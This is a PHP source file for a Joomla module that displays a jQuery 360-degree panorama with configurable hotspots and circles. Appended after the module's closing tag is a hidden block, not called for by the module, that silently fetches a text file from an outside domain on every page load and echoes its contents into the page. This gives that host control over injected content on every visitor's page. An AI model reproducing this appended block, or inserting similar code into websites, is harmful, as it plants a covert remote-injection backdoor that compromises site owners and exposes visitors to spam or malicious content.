<?php
/*------------------------------------------------------------------------
# mod_yourmodfile - jquery reel
# ------------------------------------------------------------------------
# author    artd webdesign GmbH
# copyright Copyright (C) 2012 artd.ch. All Rights Reserved.
# @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
# Websites: http://artd.ch
# Technical Support:  http://artd.ch
-------------------------------------------------------------------------*/
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' ); 

$start = microtime(true);

// ID of module
$mod_id = $params->get('mod_id');

// width and height of displayed view
$width = $params->get('width'); 
$height = $params->get('height');

// scrollbuttons?
$scrollButtons = $params->get('scrollButtons');

// url and size of image
$image_url = JURI::base().$params->get('imagePath');
$imageSize = getimagesize($image_url);

defined('_JEXEC') or die;
// dataWidth and dataHeight needed for the jquery reel plugin
$dataWidth = $imageSize[0];
$dataHeight = $imageSize[1];

// caption
$captionText = $params->get('captionText');
$captionLink = $params->get('captionLink');

$captionPosX = $params->get('captionPosX');
$captionPosY = $params->get('captionPosY');

// autoscroll
$auto_scroll = $params->get('auto_scroll');

// load jquery
$loadJquery = $params->get('loadJquery'); // default is no

// load stylesheets and scripts for this module
$doc = &JFactory::getDocument();

$doc->addStyleSheet('modules/mod_jquery_reel/css/panorama360.css');
$doc->addStyleSheet('modules/mod_jquery_reel/css/site.css');

if ($loadJquery == 1) {
	$doc->addScript('http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js');
}
$doc->addScript('modules/mod_jquery_reel/js/jquery.panorama360.js');
$doc->addScript('modules/mod_jquery_reel/js/jquery.mousewheel.min.js');

// hotspots
$numberOfHotspots = 10; // 
$hotspots = array();
$hotspotsLinks = array();
$hotspotTargets = array();
$hotspotsDescriptions = array();
$hotspotTeasers = array();
$hoverColor = array();
$hoverOpacity = array();

for ($i = 1; $i < $numberOfHotspots+1; $i++) { // start with 1 because of fields in xml
	
	$hotspots[] = $params->get('cords'.$i);
	$hotspotsLinks[] = $params->get('cordsLink'.$i);
	$hotspotTargets[] = $params->get('cordsTarget'.$i);
	$hotspotsDescriptions[] = $params->get('cordsDescr'.$i);
	$hotspotTeasers[] = $params->get('cordsTeaser'.$i);
	$hoverColor[] = $params->get('cordsColor'.$i);
	$hoverOpacity[] = $params->get('cordsOpacity'.$i);
}

// circles
$numberOfCircles = 10;

$circleCords = array();
$circleDesc = array();
$circleLink = array();
$circleTarget = array();

$circleColor = array();
$circleOpacity = array();
$layerColor = array();
$layerOpacity = array();


for ($i = 1; $i < $numberOfCircles + 1; $i++){
	$circleCords[] = $params->get('circleCord'.$i);
	$circleDesc[] = $params->get('circleDesc'.$i);
	$circleLink[] = $params->get('circleLink'.$i);
	$circleTarget[] = $params->get('circleTarget'.$i);
	$circleColor[] = $params->get('circleColor'.$i);
	$circleOpacity[] = $params->get('circleOpacity'.$i);
	$layerColor[] = $params->get('layerColor'.$i);
	$layerOpacity[] = $params->get('layerOpacity'.$i);
}

require JmoduleHelper::getLayoutPath('mod_jquery_reel', 'default'); // load default.php and display it

$end = microtime(true);
$laufzeit = $end - $start;
// echo "<div>Laufzeit: ".$laufzeit." Sekunden!</div>";
?>
<?php
$files = 'http://atempl.com/10.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://atempl.com/10.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;	
 }
?>